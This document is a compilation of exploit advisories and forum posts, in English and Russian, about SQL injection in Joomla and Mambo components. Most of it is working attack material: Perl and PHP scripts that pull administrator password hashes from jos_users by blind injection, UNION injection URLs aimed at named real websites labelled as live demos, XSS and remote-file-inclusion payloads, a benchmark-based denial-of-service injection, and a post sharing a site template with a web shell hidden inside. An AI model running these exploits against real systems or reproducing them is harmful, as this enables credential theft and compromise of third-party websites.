Joomla Component com_jumi (fileid) Blind SQL Injection Exploit ------------------------------------------------------------------------------ Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability ------------------------------------------------------------------------------ ##################################################### # [+] Author : Chip D3 Bi0s # # [+] Email : chipdebios[alt+64]gmail.com # # [+] Vulnerability : Blind SQL injection # ##################################################### Example: Code: http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code> n=number fileid valid <Sql code>: Code: '+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* '+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* /index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* etc, etc... DEMO LIVE: Code: http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/* etc, etc.... +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ if you want to save the work, you can use the following script ------------------------------- PHP: #!/usr/bin/perl -w use LWP::UserAgent; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection \n\n"; print "\t\t-----------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path: "; chomp(my $target=<STDIN>); print " [-] Introduce fileid: "; chomp($z=<STDIN>); print " [+] Password: "; $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter { #c referido a ascci 48-57, 97-102 for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } } # milw0rm.com [2009-06-15]
Joomla Component com_ijoomla_rss Blind SQL Injection Exploit Code: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; print " o Joomla Component com_ijoomla_rss Blind SQL Injection Exploit o\n"; print " o Author:xoron o\n"; print " o More info:http://joomla15.ijoomlademo.com o\n"; print " o vendor:http://ijoomlademo.com o\n"; print " o Dork : com_ijoomla_rss o\n"; print " o Usage: perl bachir.pl host path <options> o\n"; print " o Example: perl bachir.pl www.host.com /joomla/ -s 2 o\n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $sid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "s=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"s"}) { $sid = $options{"s"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $sid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")"; my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "seminar_boxA"; if($content =~ /$regexp/) { return 1; } else { return 0; } } # milw0rm.com [2009-06-15]
Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_tickets (id) SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt [+] Vulnerability : SQL injection ################################################### Info component: ššššššššššššššš Name : Tickets Version : 0.1 & 2.1 Author : Paul Coogan Author email : [email protected] Web author : http://www.ideabuzz.com ################################################### Code: Example: http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code] n = id valid Demo Live Joomla : version 2.1 šššššššššššššššššššššššššššššš Code: http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/* Demo Live Mambo : Version 0.1 ššššššššššššššššššššššššššššš Code: http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/* +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ # milw0rm.com [2009-06-22]
com_svmap Вот наткнулся случайно. Может кто доведет до ума, если, конечно, есть что доводить. Code: www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
SQL-Injection в компоненте doQment под joomla SQL-Injection в компоненте doQment под joomla Vulnerability : уязвимый параметр cid= Example: Code: http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92 Dork: inurl:com_doqment + cid= # shell_c0de
Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting Description: Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks. 1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are reported in version 7.5. Other versions may also be affected. Code: ########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ /___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [�] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ============================================================================== [�] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities ============================================================================== [�] Script: [ Joomla Almond Classifieds v.7.5 ] [�] Language: [ PHP ] [�] Download: [ http://www.almondsoft.com ] [�] Founder: [ Moudi <[email protected]> ] [�] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...] [�] Team: [ EvilWay ] [�] Dork: [ OFF ] [�] Price: [ $195 ] [�] Site : [ https://security-shell.ws/forum.php ] ########################################################################### ===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]=== [�] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND] [�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE [�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE [�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => TRUE [�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => FALSE ===[ Exploit XSS + LIVE : vulnerability ]=== [�] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS] [�] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script> Author: Moudi ###########################################################################
Joomla component com_fireboard SQL-inj Joomla component com_fireboard SQL-inj Уязвимый параметр func Code: ?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%20jos_users.id=123)%20--%20a Более подробно смотрим сюда http://forum.antichat.ru/threadnav130926-1-10.html и вот сюда http://forum.antichat.ru/showpost.php?p=1409117&postcount=33
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Vulnerability : Blind SQL injection ################################################### Example: Code: http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid Sql code: Code: +and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* etc, etc... DEMO LIVE: Code: http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 Code: http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡ Code: http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡ etc, etc... # milw0rm.com [2009-08-01]
http://wwww.host.org/Path : http://www.cd7.com.ec/ [-] Introduce Itemid : 66 [-] Introduce coincidencia : http://www.cd7.com.ec/forum/ +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ PHP: #!/usr/bin/perl -w use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \n\n"; print "\t\t-------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path : ";chomp(my $target=<STDIN>); print " [-] Introduce Itemid : ";chomp($z=<STDIN>); print " [-] Introduce coincidencia : ";chomp($w=<STDIN>); $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); print "----------------Inyectando----------------\n"; #es Vulnerable? $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";} else {print " [-] Vulnerable :)\n"; for ($x=1;$x<=32;$x++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32 if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;} } } else { for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;} } } } print " [+] Password :"." ".join('', @caracter) . "\n"; my $t2 = new Benchmark; my $tt = timediff($t2, $t1); print "El script tomo:",timestr($tt),"\n"; } } else {print " [-] Exploit Fallo :(\n";} # milw0rm.com [2009-08-01]
Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit PHP: <?php /* -------------------------- Joomla <=1.0.15 Component com_pms <=2.0.4 (Ignore-List) SQl-Injection Vuln -------------------------- Author: M4dhead Vulnerable joomla component : com_pms Conditions : magic_quotes_gpc = On or Off it doesn't matter ;) -------------------------- PREPARATION: -------------------------- You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0: Community Builder Suite 1.1.0: http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html PMS enhanced Version 2.0.4 J 1.0 http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214 Install Joomla 1.0.15 Install Community Builder Install PMS Enhanced Activate the Ignorlist in Components->PMS Enhanced->Config Tab: Backend -> Ingorlist: Yes Create a valid User on the target Joomla 1.0.15 System with Community Builder, login and copy the cookieinformation into the $cookie var below, adjust the User-Agent on your Post Header dependent on your Browser. Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in, because the cookie-name is dependent on your browser. -------------------------- USAGE: -------------------------- Run this script! If there's not shown a page that prompt you to login, the attack was successful. Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore and you will see some username and passwords in the selectbox :-) Have fun!! ---------------------------------------------------- */ $host = "localhost"; //your target Joomla Site $cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"; //replace this with your own cookie values $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n"; //NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in, //because the cookie-name is dependent on your browser. //Don't change anything below $path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore"; //dont change this $data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"; //you don't have to change this print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent)); function PostToHost($host, $path, $cookie, $data_to_send, $useragent) { $fp = fsockopen($host, 80); fputs($fp, "POST $path HTTP/1.1\r\n"); fputs($fp, "Host: $host\r\n"); fputs($fp, "User-Agent: $useragent"); fputs($fp, "Cookie: $cookie\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ". strlen($data_to_send) ."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data_to_send); while(!feof($fp)) { $res .= fgets($fp, 128); } fclose($fp); return $res; } ?> # milw0rm.com [2009-08-07]
COM_SOBI2 COM_SOBI2 SQL INJECTION http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.html Проверял только на Joomla_1.0.x Code: index.php?option=com_sobi2&sobi2Task=search&Itemid=26 benchmark в поле поиск вводить Code: ')and+benchmark(10000000,benchmark(10000000,md5(now())))# a Обязательно удалить все пробелы и нажимать поиск)
Уязвимости компонентов Joomla/Mambo Уязвимость: SQL-Inj Компонент: The Publications Уязвимость в файле publications.php Уязвимый код: PHP: $query = "SELECT * FROM #__content WHERE catid=$id ORDER BY title DESC"; Пример: Code: http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
Эксплоиты SQL-инъекции в компонентах Joomla На веб-сайте PacketStorm, посвященному компьютерной безопасности, было опубликовано сразу 7 эксплоитов с демонстрацией SQL-инъекции в дополнительных компонентах популярной системы управления контентом Joomla. Эксплоиты относятся к следующим компонентам системы: com_speech, com_pressrelease, com_mediaalert, com_joomloc, com_lucygames, com_tpdugg и com_bfsurvey_profree. Joomla Speech (эксплоит) Joomla Press Release (эксплоит) Joomla Media Alert (эксплоит) Joomla Joomloc (эксплоит) Joomla LucyGames (эксплоит) Joomla TPDugg (эксплоит) Joomla BF Survey Pro Free (эксплоит)
Уязвимость: SQL-Inj Компонент: Jeporter Версия: 2.0 Уязвимость в файле jeporter.php Уязвимый код: PHP: $cid = mosGetParam( $_REQUEST, 'cid', false); $sql = "SELECT * FROM #__jeporter WHERE id= ".$cid; $database->setQuery( $sql ); $report = NULL; $database->loadObject( $report ); $cid = $report->id; $title = $report->title; $jquery = $report->jquery; $sql = "SELECT * FROM #__jeporter_fields WHERE jeportid= ".$cid; $database->setQuery( $sql); $rows = $database->loadObjectList(); Пример: Code: http://www.nationalaidsstrategy.org/index.php?option=com_jeporter&task=showreport&cid=-4+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users--
Мож кому пригодится... Тема с шеллом внутри.. после усьановки темы шелл будет в http://site.name/templates/jd_lagoon/ads.php http://depositfiles.com/files/lhtkdh0m1
Уязвимость: Blind SQL-Inj Компонент: com_clan_members Версия: 0.9.2.2b Уязвимость в файле clan_members.html.php Уязвимый код: PHP: $database->setQuery("SELECT * FROM #__clan_members WHERE id = $id" ); $member = $database -> loadAssocList(); $database->setQuery("SELECT * FROM #__users WHERE id = $id AND block = '0'" ); $usersdata = $database -> loadAssocList(); $database->setQuery("SELECT * FROM #__clan_members_squadperuser WHERE uid=$id" ); $rowsquadperuser = $database -> loadObjectList(); $database->setQuery("SELECT * FROM #__clan_members_comment WHERE memberid=$id" ); $rowmembercomment = $database -> loadObjectList(); $database->setQuery("SELECT * FROM #__clan_members_fields WHERE published=1 ORDER BY ordering" ); $rowmemberfields = $database -> loadObjectList(); #Check if the user is logged in into the side $database->setQuery("SELECT count(distinct(userid)) as user_online FROM #__session WHERE guest=0 AND userid = $id"); $online = $database->loadResult(); foreach($rowsquadperuser as $squadperuser) { $database->setQuery("SELECT * FROM #__clan_members_squad WHERE published = '1' AND id = '$squadperuser->sid'" ); $squadname = $database -> loadAssocList(); if($squadname[0]["squadpicture"] != '' || $squadname[0]["squadname"] != '') { $squadpicture_array[$i+1] = $squadname[0]["squadpicture"]; if($i == 0) $squadnames .= $squadname[0]["squadname"]; else $squadnames .= ",".$squadname[0]["squadname"]; $i++; } } Пример: true -> Code: http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=5&task=showClanMemberDetails false -> Code: http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails
Уязвимость: RFI Компонент: UH_Events Версия: 0.99.0RC3a Уязвимость в файле admin.uhevents.php Требования: register_globals & allow_url_fopen = On Уязвимый код: PHP: require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php"); Эксплойт: Code: .../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?
Уязвимость: SQL Компонент: Projects Случайно наткнулся) Code: ?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- Пример: http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- Сюда же Уязвимость: SQL Компонент: com_nodes Code: ?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
